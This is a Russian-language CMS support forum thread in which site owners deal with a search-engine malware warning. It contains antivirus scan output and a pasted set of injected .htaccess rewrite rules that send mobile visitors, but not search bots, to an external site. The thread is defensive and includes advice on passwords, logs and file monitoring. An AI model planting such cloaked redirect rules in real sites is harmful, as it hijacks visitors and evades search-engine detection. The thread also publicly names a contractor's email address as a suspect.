Добрый день, Гость! Представляем Вам наши форумы. Вы можете зарегистрироваться чтобы писать на форумах или зайдите под своим именем, если Вы уже регистрировались.
   
   


Форум
 SX CMS / Техническая помощь
         Вредоносный код

Похожие темы

Вредоносный код


События Суббота, 01.06.2013, 17:56

Игорь Вишневский

Группа: Пользователь
Ранг: Новичок
Cообщений: 24
Регистрация: 20.01.2013
Город: Краснодар
Вредоносный код
Здравствуйте!

Получено письмо от "Яндекс.Вебмастер"

"На страницах вашего сайта dom-dizayna.ru обнаружен код, который может быть опасен для посетителей. ...
... сайт выводится в результатах поиска с пометкой «Этот сайт может угрожать безопасности вашего компьютера». ..."


Проверка встроенным антивирусом Status-X
===========
Подозрительные файлы

/lib/editor/ckeditor.js <iframe 74 2462
/lib/editor/ckeditor.js <iframe 100 1815
/lib/editor/ckeditor.js <iframe 113 117
/lib/editor/ckeditor.js <iframe 143 1053
/lib/editor/ckeditor.js <iframe 147 678
/lib/editor/ckeditor.js <iframe 151 2095
/class/class.LinkfeedClient.php LINKFEED_USER 106 22
/class/class.LinkfeedClient.php LINKFEED_USER 107 48
/class/class.LinkfeedClient.php LINKFEED_USER 139 26
/class/class.LinkfeedClient.php __linkfeed_robots__ 187 64
/class/class.LinkfeedClient.php __linkfeed_robots__ 192 35
/class/class.LinkfeedClient.php __linkfeed_robots__ 192 112
/class/class.LinkfeedClient.php __linkfeed_robots__ 238 64
/lang/en/admin.txt system( 1002 25
/lang/de/admin.txt system( 965 24
/lang/de/main.txt system( 374 25
/admin/class/class.AdminSettings.php <iframe 660 90
/jquery.js
===========

На сколько это опасно, как это исправить?

Пользователь офлайн
События Суббота, 01.06.2013, 20:12

SX

Группа: Администратор
Cообщений: 3016
Регистрация: 23.10.2009
По поводу последнего пункта не помню, все остальные это исключение, на форуме писалось.
Ищите дальше, я у вас ничего не нашел на сайте, в коде чисто


Пользователь офлайн
События Среда, 10.07.2013, 00:02

Kalyda

Группа: Пользователь
Ранг: Новичок
Cообщений: 33
Регистрация: 27.10.2009
Город: Москва
Тоже получил предупреждение от Яши по поводу мобильного редиректа , по факту проверки в корневом htaccess( CHMOD 644) появилось
PHP-код
RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|windows phone|iemobile|nokia|ucweb|ucbrowser|iPad|iPhone) [NC]
RewriteCond %{HTTP_USER_AGENT} !(bot|ia_archiver|crawler|slurp|validator|webalta|yahoo|yandex|google|curl|wget) [NC]
RewriteRule (.*) [URL]http://m.extrasoftware.biz/?29&source=BLA_BLA_BLA.ru [L,R=302] # on

Есть идеи каким макаром это могло случиться? версия 1.04

Отредактировано Kalyda: 10.07.2013, 00:04:57


Люди в основе своей очень добрые ......только напоминать им об этом скоро будет некому
Пользователь офлайн
События Среда, 10.07.2013, 00:05

SX

Группа: Администратор
Cообщений: 3016
Регистрация: 23.10.2009
Меняйте пароли на фтп, и листайте логи.
Да и есть система защиты файлов, если бы использовали ее, то получили бы оповещение о том что файл изменили.
И работает она гораздо лучше рекламируемого айболита
Вот блин каждому нужно говорить об этих мелочах.


Пользователь офлайн
События Среда, 10.07.2013, 00:13

SX

Группа: Администратор
Cообщений: 3016
Регистрация: 23.10.2009
За сигнатуру спасибо, ща добавлю в базу


Пользователь офлайн
События Среда, 10.07.2013, 00:23

Игорь Вишневский

Автор текущей темы
Группа: Пользователь
Ранг: Новичок
Cообщений: 24
Регистрация: 20.01.2013
Город: Краснодар
Да-да, Яша ругался на редирект для мобильных устройств, а хостер мне прислал результаты проверки - именно этот код и был в файлах htaccess.
У меня работал и имел полный доступ некий Артём (Украина) вот его мыло artvict.investor@gmail.com. Может и увас он работал?
Я убрал этот код из всех файлов htaccess (у меня там несколько сайтов и код был не во всех). Прошло уже две недели - код не появляется, Яша спокоен - значит вредных скриптов нет и код был внесён вручную. Кроме меня и наёмного программера там никого не было - вывод ясен.
Пользователь офлайн
События Среда, 10.07.2013, 00:30

SX

Группа: Администратор
Cообщений: 3016
Регистрация: 23.10.2009
База антивируса обновлена, всем рекомендуется нажать кнопку обновления и провериться.


Пользователь офлайн
События Среда, 10.07.2013, 00:38

Игорь Вишневский

Автор текущей темы
Группа: Пользователь
Ранг: Новичок
Cообщений: 24
Регистрация: 20.01.2013
Город: Краснодар
Цитата
Автор: Status-X
База антивируса обновлена, всем рекомендуется нажать кнопку обновления и провериться.


Кстати, сайт для редиректа у меня был другой. И в принципе - может быть любой.
Пользователь офлайн
События Среда, 10.07.2013, 00:45

SX

Группа: Администратор
Cообщений: 3016
Регистрация: 23.10.2009
Да тут в общем то дело не в сигнатуре, а просто в обычной лени, сделать при заливке сайта снимок системы, когда она чистаРжу нимагу А дальше забил и все, а вот если файлы поменяются, то придет письмо, люди предохраняйтесьРжу нимагу


Пользователь офлайн
События Среда, 10.07.2013, 00:55

Игорь Вишневский

Автор текущей темы
Группа: Пользователь
Ранг: Новичок
Cообщений: 24
Регистрация: 20.01.2013
Город: Краснодар
Цитата
Автор: Status-X
Да тут в общем то дело не в сигнатуре, а просто в обычной лени, сделать при заливке сайта снимок системы, когда она чистаРжу нимагу А дальше забил и все, а вот если файлы поменяются, то придет письмо, люди предохраняйтесьРжу нимагу


Нет возражений! В Status-X не мало вариантов предохранятся. Но у меня несколько сайтов на этом хостинге, из них только один на Status-X. А доступ - общий ко всем, через cPanel. Ни кто не застрахован от недобросовестного наёмника, или сотрудника, или даже напарника. Во всяком случае - предохраняться нужно, факт бесспорный и в Status-X есть всё необходимое для этого.
Пользователь офлайн


Похожие темы  |   Предыдущая тема  |   Следующая тема

Быстрый переход:  
 

 Сейчас на сайте

Пользователей: 0, Гостей: 0

Поисковые боты: 217
Bot(187), oBot(14), Googlebot, Yandex(2), Google(2), BingBot(4), Mail.Ru Bot(7)
 Статистика форума

  Темы Сообщения Пользователи
За сутки:
За неделю:
За месяц:
Всего:
Мы приветствуем нового участника: wonad81290
 Дни рождения

KorSa (45), menshealth (38)
Copyright © 2009 - 2024 SX All rights reserved | Powered by SX CMS 1.06 UTF | Контакты